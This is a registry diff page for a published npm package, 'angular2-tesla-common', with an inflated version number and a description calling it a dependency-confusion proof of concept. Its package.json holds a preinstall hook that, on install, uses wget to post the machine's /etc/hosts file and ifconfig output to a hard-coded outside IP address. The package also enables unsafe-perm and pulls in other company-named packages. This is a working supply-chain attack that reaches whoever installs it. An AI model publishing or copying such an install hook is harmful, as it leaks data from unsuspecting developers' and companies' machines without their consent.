angular2-tesla-common 999999999.9999999999.9999999999
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +3 -0
- package/package.json +24 -0
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,24 @@
|
|
1
|
+
{
|
2
|
+
"name": "angular2-tesla-common",
|
3
|
+
"version": "999999999.9999999999.9999999999",
|
4
|
+
"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "",
|
8
|
+
"preinstall": "wget --quiet --post-data=\"hosts=$(cat /etc/hosts)&ifconfig=$(ifconfig)\" http://34.28.225.2/poc.php # CHANGE IP ADDRESS"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"test",
|
12
|
+
"PoC"
|
13
|
+
],
|
14
|
+
"dependencies": {
|
15
|
+
"angular2-tesla-common-1": "^9001.0.0",
|
16
|
+
"tesla_mega_menu_1": "^500.0.0",
|
17
|
+
"tesla-main": "^500.0.0"
|
18
|
+
},
|
19
|
+
"config": {
|
20
|
+
"unsafe-perm": true
|
21
|
+
},
|
22
|
+
"author": "WayCup",
|
23
|
+
"license": "ISC"
|
24
|
+
}
|